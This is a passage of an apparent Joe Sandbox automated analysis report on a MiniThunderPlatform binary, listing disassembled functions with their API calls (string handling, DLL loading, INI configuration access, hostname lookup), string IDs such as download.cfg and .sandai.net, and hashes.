                                                                                                                                              • API String ID: 2541744101-705139129
                                                                                                                                              • Opcode ID: aa83900dfe197e98b775704a956e58c495b2cf24d5f90eb2fdbe1bc15c968d0b
                                                                                                                                              • Instruction ID: 1cdc3708459eb8ff8e8215143cd130cc9bee6b6e84683c8ad488ba57723cbf51
                                                                                                                                              • Opcode Fuzzy Hash: aa83900dfe197e98b775704a956e58c495b2cf24d5f90eb2fdbe1bc15c968d0b
                                                                                                                                              • Instruction Fuzzy Hash: 3BA13CB5900215EFCB14CF94C884ADEBBB8FF4D710F5081A9F909AB246D771AA45CFA0
                                                                                                                                              Function 00425A30 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 203libraryloaderCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1348 425a30-425b73 call 4182d4 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ call 418004 call 417604 ?assign@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@ABV12@@Z call 418004 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 ??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z call 418004 call 41714a call 4170c3 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ call 418004 call 41823e 1371 425bb6-425bdf ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ call 418004 LoadLibraryW call 418004 1348->1371 1372 425b75-425bb1 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 1348->1372 1382 425cb3-425ceb ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 1371->1382 1383 425be5-425c04 GetProcAddress call 418004 1371->1383 1381 425cf1-425d1f call 417726 call 418004 1372->1381 1382->1381 1390 425ca0-425cae FreeLibrary call 418004 1383->1390 1391 425c0a-425c58 call 417b8b ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEABDI@Z call 418004 1383->1391 1390->1382 1401 425c5c-425c65 call 418004 1391->1401 1404 425c87-425c9b ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 418004 1401->1404 1405 425c67-425c83 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z call 418004 1401->1405 1404->1390 1405->1404
                                                                                                                                              APIs
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71(0000002E), ref: 00425A81
                                                                                                                                              • ?assign@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 00425AC3
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00425ADC
                                                                                                                                              • ??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(0x8000000), ref: 00425AF3
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00425B49
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 00425B5B
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00425B85
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00425B9E
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 00425BBB
                                                                                                                                              • LoadLibraryW.KERNEL32(00000000), ref: 00425BCB
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,get_peer_id_ex), ref: 00425BF0
                                                                                                                                              • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEABDI@Z.MSVCP71(00000000,00000010,08000000,00000010,00000000), ref: 00425C4B
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 00425C76
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 00425C93
                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00425CA6
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00425CC5
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00425CDE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$??1?$basic_string@_$?data@?$basic_string@_D@2@@std@@D@std@@U?$char_traits@V?$allocator@$LibraryV12@V12@@$??1?$basic_string@??4?$basic_string@_?assign@?$basic_string@?assign@?$basic_string@_A?$basic_string@AddressFreeLoadProcV01@
                                                                                                                                              • String ID: 0x8000000$dl_peer_id.dll$get_peer_id_ex
                                                                                                                                              • API String ID: 2667674723-1076500767
                                                                                                                                              • Opcode ID: d1d4a2a013c6850e1ae6bab208399feda0b20450b93ca20ee4db64420909ec18
                                                                                                                                              • Instruction ID: 18b227110f99bbf59a54164857b9050127a29ad0314b3e2ef5854237e2531e68
                                                                                                                                              • Opcode Fuzzy Hash: d1d4a2a013c6850e1ae6bab208399feda0b20450b93ca20ee4db64420909ec18
                                                                                                                                              • Instruction Fuzzy Hash: C1819572C006589FDB60EB65DC867CDBB759F04318F41019AE909A7242DB395E88CBD9
                                                                                                                                              Function 100164DE Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 131COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100164E3
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 1001650B
                                                                                                                                                • Part of subcall function 10001000: RtlInitializeCriticalSection.NTDLL(?), ref: 1000100D
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001653B
                                                                                                                                                • Part of subcall function 1000F850: 754B1540.VERSION(00000000), ref: 1000F8AC
                                                                                                                                                • Part of subcall function 1000F850: ??_V@YAXPAX@Z.MSVCR71(00000000,?,00000000,?,00000000,7C3869BF,7C3869BF), ref: 1000F8E8
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(product_release_id,?,?,?,7C3869BF), ref: 100165BC
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(env,?,?,?,7C3869BF), ref: 100165D2
                                                                                                                                                • Part of subcall function 100162A0: __EH_prolog.LIBCMT ref: 100162A5
                                                                                                                                                • Part of subcall function 100162A0: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?,?,00000000,?,00000014,env), ref: 10016309
                                                                                                                                                • Part of subcall function 100162A0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,?,00000014,env), ref: 10016316
                                                                                                                                                • Part of subcall function 100162A0: RtlLeaveCriticalSection.NTDLL(?), ref: 10016323
                                                                                                                                                • Part of subcall function 100162A0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,?,00000014,env), ref: 10016330
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000014,00000000,?,?,?,7C3869BF), ref: 100165FE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 1001660E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?,?,7C3869BF), ref: 10016631
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,?,7C3869BF), ref: 10016648
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,?,7C3869BF), ref: 10016658
                                                                                                                                                • Part of subcall function 10015F72: __EH_prolog.LIBCMT ref: 10015F77
                                                                                                                                                • Part of subcall function 10015F72: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(env,10016665,?,?,?,7C3869BF), ref: 10015FA5
                                                                                                                                                • Part of subcall function 10015F72: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 10015FB5
                                                                                                                                                • Part of subcall function 10015F72: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 10015FC5
                                                                                                                                                • Part of subcall function 10015F72: GetPrivateProfileSectionNamesA.KERNEL32(?,00000800,?), ref: 10015FEA
                                                                                                                                                • Part of subcall function 10015F72: GetPrivateProfileSectionA.KERNEL32(?,?,00000800,?), ref: 10016020
                                                                                                                                                • Part of subcall function 10015F72: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 10016045
                                                                                                                                                • Part of subcall function 10015F72: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(00000000), ref: 10016052
                                                                                                                                                • Part of subcall function 10015F72: ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP71(0000003D,00000000), ref: 10016062
                                                                                                                                                • Part of subcall function 10015F72: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000000,00000000), ref: 1001607A
                                                                                                                                                • Part of subcall function 10015F72: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000001,?), ref: 10016098
                                                                                                                                                • Part of subcall function 10015F72: strlen.MSVCR71(00000000,?,?,00000000,?,?), ref: 10016100
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(setting_file_name,?,?,?,7C3869BF), ref: 10016670
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(env,?,?,?,7C3869BF), ref: 10016681
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,7C3869BF), ref: 100166B1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 100166C1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 100166D1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 100166E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@$V12@$Section$?assign@?$basic_string@H_prologV12@@$??4?$basic_string@?append@?$basic_string@CriticalPrivateProfileV01@$?find_first_of@?$basic_string@B1540FileInitializeLeaveModuleNameNamesstrlen
                                                                                                                                              • String ID: download.cfg$env$product_release_id$setting_file_name
                                                                                                                                              • API String ID: 3969027658-2556670429
                                                                                                                                              • Opcode ID: 92b2a533db09e8e8634e85ca03f585ed91a9fca418818b83dd376248a4d04e44
                                                                                                                                              • Instruction ID: 79573bac2190ed74f8851acfeccf235bf0db8eb72d2d7ba5517e8cae42cd4d9a
                                                                                                                                              • Opcode Fuzzy Hash: 92b2a533db09e8e8634e85ca03f585ed91a9fca418818b83dd376248a4d04e44
                                                                                                                                              • Instruction Fuzzy Hash: 19512A71800168DBDB21DBA4CD9CBDDBBB8AF69705F4041DAE50EA3241DB746B88CF61
                                                                                                                                              Function 10055A20 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 202COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(.sandai.net,?,?,774D23A0), ref: 10055A60
                                                                                                                                              • ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(?,FFFFFFFF,?), ref: 10055AA2
                                                                                                                                              • ??0?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000002,00000001), ref: 10055ADB
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@D@Z.MSVCP71(00000000), ref: 10055B07
                                                                                                                                              • ?str@?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71 ref: 10055B52
                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(dns_cache,?,-00000004,-00000004), ref: 10055B8E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10055B9B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10055BAD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10055BBF
                                                                                                                                              • ??_D?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 10055BD1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10055D0A
                                                                                                                                                • Part of subcall function 10001482: __EH_prolog.LIBCMT ref: 10001487
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,10277ABC), ref: 1000149A
                                                                                                                                                • Part of subcall function 10001482: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 100014AB
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100014B5
                                                                                                                                                • Part of subcall function 10001482: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100014C5
                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(dns_cache,00000001,102768F0,?,00000400,-00000004), ref: 10055C51
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10055C5B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10055C6D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 10055C82
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10055CF2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$PrivateProfileStringV01@@$??$?6??0?$basic_ostringstream@?rfind@?$basic_string@?str@?$basic_ostringstream@D?$basic_ostringstream@D@2@@2@D@std@@@0@D@std@@@std@@H_prologV01@V10@V?$basic_ostream@V?$basic_string@WriteY?$basic_string@
                                                                                                                                              • String ID: .sandai.net$asyn_frame.dat$dns_cache
                                                                                                                                              • API String ID: 1376012173-3952834176
                                                                                                                                              • Opcode ID: d6ae5ee3ae7cc9095c363f0d13958585ae4321e07e058f370f57a002b0dcbe30
                                                                                                                                              • Instruction ID: 2d3becb7483b03b95308edb7453fa3aa59dd17147b83e882efed2ba1a37e2555
                                                                                                                                              • Opcode Fuzzy Hash: d6ae5ee3ae7cc9095c363f0d13958585ae4321e07e058f370f57a002b0dcbe30
                                                                                                                                              • Instruction Fuzzy Hash: F18192715083919FD724CF24C898B9BBBE4EFA9305F04495DE98A87252DB70A948CF92
                                                                                                                                              Function 100E9B40 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 129networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • gethostname.WS2_32(?,00000400), ref: 100E9B86
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 100E9B91
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(0.0.0.0), ref: 100E9B9E
                                                                                                                                              • gethostbyname.WS2_32(?), ref: 100E9BB1
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 100E9BBD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(0.0.0.0), ref: 100E9BCA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100E9CEF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100E9D09
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$ErrorLast$??1?$basic_string@V01@@gethostbynamegethostname
                                                                                                                                              • String ID: 0.0.0.0$127.0.0.1$169
                                                                                                                                              • API String ID: 3947631988-2620441053
                                                                                                                                              • Opcode ID: aba10d01ebaad4a0b949e46351a454490539b41e6b92e36426b9fc11bdec20a6
                                                                                                                                              • Instruction ID: 4db93d7cc9a99e49ad7faf38419870707a16b7a1f47f349d4a3ee26c5c2c0c85
                                                                                                                                              • Opcode Fuzzy Hash: aba10d01ebaad4a0b949e46351a454490539b41e6b92e36426b9fc11bdec20a6
                                                                                                                                              • Instruction Fuzzy Hash: D141BB712083518FC720EF25CC8CB9AB7E5FB98B04F904A1DF546932A1CB35A889CF56
                                                                                                                                              Function 004255B0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 180COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 004255FB
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71(0000002E), ref: 00425620
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z.MSVCP71(0x8000000), ref: 0042564B
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004256A8
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 004256D4
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71(00000001,00000001,00000000), ref: 0042570F
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71(00000000), ref: 00425725
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71(00000000,00000000), ref: 0042573A
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71(00000000), ref: 0042574D
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000), ref: 0042576F
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 00425795
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004257AE
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004257C4
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004257DA
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004257F3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$?data@?$basic_string@_$??1?$basic_string@_$??0?$basic_string@_?data@?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@
                                                                                                                                              • String ID: 0x8000000$MINITP\BugReport\
                                                                                                                                              • API String ID: 1662436476-1877037076
                                                                                                                                              • Opcode ID: cac32c2472425d099c65f383a261fcde34e3ad2e60a0782dcd588010909650a6
                                                                                                                                              • Instruction ID: 150ceced792e316554fc4487638913e14105c364d38e4896389e6a16a2d438ec
                                                                                                                                              • Opcode Fuzzy Hash: cac32c2472425d099c65f383a261fcde34e3ad2e60a0782dcd588010909650a6
                                                                                                                                              • Instruction Fuzzy Hash: BF51C372D005189BDB60B7B5DC467CDBA74AF44318F4201AEF80AA7182DE385E8887DA
                                                                                                                                              Function 10015F72 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 130stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10015F77
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(env,10016665,?,?,?,7C3869BF), ref: 10015FA5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 10015FB5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 10015FC5
                                                                                                                                              • GetPrivateProfileSectionNamesA.KERNEL32(?,00000800,?), ref: 10015FEA
                                                                                                                                              • GetPrivateProfileSectionA.KERNEL32(?,?,00000800,?), ref: 10016020
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 10016045
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(00000000), ref: 10016052
